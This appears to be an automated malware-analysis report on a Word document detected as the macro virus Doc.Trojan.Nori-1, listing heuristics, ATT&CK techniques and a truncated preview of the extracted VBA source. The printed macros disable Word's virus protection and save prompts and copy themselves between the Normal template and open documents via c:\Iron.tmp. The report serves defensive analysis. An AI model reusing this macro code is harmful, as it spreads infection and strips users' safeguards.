MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The presence of AutoOpen and Auto_Close VBA macros, along with a critical ClamAV detection for 'Doc.Trojan.Nori-1', strongly indicates malicious intent. The VBA macro 'ToN' attempts to create a file at 'c:\Iron.tmp', suggesting it's part of a payload delivery or execution chain. The document body content appears to be unrelated boilerplate text, likely used to obscure the malicious macro.
Heuristics 5
-
ClamAV: Doc.Trojan.Nori-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Nori-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11498 bytes |
SHA-256: 03baf33b3b8c3095bee0c47c6fbabe6e45386871a0d5fc630ebf195f32c57874 |
|||
|
Detection
ClamAV:
Doc.Trojan.Nori-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Unit"
Sub ToN()
'Iron
On Error Resume Next
file = "c:\Iron.tmp"
Un = "Unit"
With NormalTemplate.VBProject.VBComponents
'8
NormalTemplate.Save
Kill (file)
End With
End Sub
Sub ToA()
On Error Resume Next
file = "c:\Iron.tmp"
Un = "Unit"
With ActiveDocument.VBProject.VBComponents
'18
ActiveDocument.SaveAs ActiveDocument.FullName
Kill (file)
End With
End Sub
Sub AutoOpen()
On Error Resume Next
If Options.VirusProtection Then Options.VirusProtection = Not Options.VirusProtection
If Options.ConfirmConversions Then Options.ConfirmConversions = Not Options.ConfirmConversions
If Options.SaveNormalPrompt Then Options.SaveNormalPrompt = Not Options.SaveNormalPrompt
file = "c:\Iron.tmp"
Un = "Unit"
If NormalTemplate.VBProject.VBComponents.Item(Un).CodeModule.Lines(2, 1) <> "'Iron" Then
ActiveDocument.VBProject.VBComponents(Un).Export (file)
With Ac
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.